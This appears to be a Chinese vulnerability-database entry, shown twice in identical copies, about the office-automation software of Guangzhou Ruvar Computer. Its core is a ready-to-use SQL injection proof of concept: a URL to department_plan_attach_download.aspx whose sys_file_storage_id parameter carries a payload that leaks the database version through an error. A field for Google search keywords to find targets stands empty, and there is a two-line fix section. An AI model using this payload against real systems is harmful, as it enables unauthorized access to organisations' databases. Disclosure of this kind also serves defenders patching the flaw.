VULHUB ™

### 0x01 影响厂商 开发公司:广州市璐华计算机有限公司(http://www.ruvar.com) 广州市璐华计算机科技有限公司成立于2002年1月,是一家专业从事软件等高新技术开发及应用的高科技企业， 2003年获得广东省信息产业厅的双软认定。 公司坚持以“成就客户、诚信负责、创新创业”为核心价值观，围绕“以用户需求为出发点，为用户设计个性化的服务”的基本营销理念， 力求以最大的努力把最先进的管理思想、最优秀的产品、最先进的技术、最严谨的安全措施、最优惠价格、最完善的服务，应用到企事业的各个领域，协助企事业单位合理充分地享用到互联网技术带来的商务网络协同办公管理。  ### 0x02 漏洞利用 谷歌关键字：  利用POC： /DepartmentPlan/department_plan_attach_download.aspx?sys_file_storage_id=%27%2b+(select+convert(int%2c@@version)+FROM+syscolumns)+%2b%27  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等产品

### 0x01 影响厂商 开发公司:广州市璐华计算机有限公司(http://www.ruvar.com) 广州市璐华计算机科技有限公司成立于2002年1月,是一家专业从事软件等高新技术开发及应用的高科技企业， 2003年获得广东省信息产业厅的双软认定。 公司坚持以“成就客户、诚信负责、创新创业”为核心价值观，围绕“以用户需求为出发点，为用户设计个性化的服务”的基本营销理念， 力求以最大的努力把最先进的管理思想、最优秀的产品、最先进的技术、最严谨的安全措施、最优惠价格、最完善的服务，应用到企事业的各个领域，协助企事业单位合理充分地享用到互联网技术带来的商务网络协同办公管理。  ### 0x02 漏洞利用 谷歌关键字：  利用POC： /DepartmentPlan/department_plan_attach_download.aspx?sys_file_storage_id=%27%2b+(select+convert(int%2c@@version)+FROM+syscolumns)+%2b%27  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等产品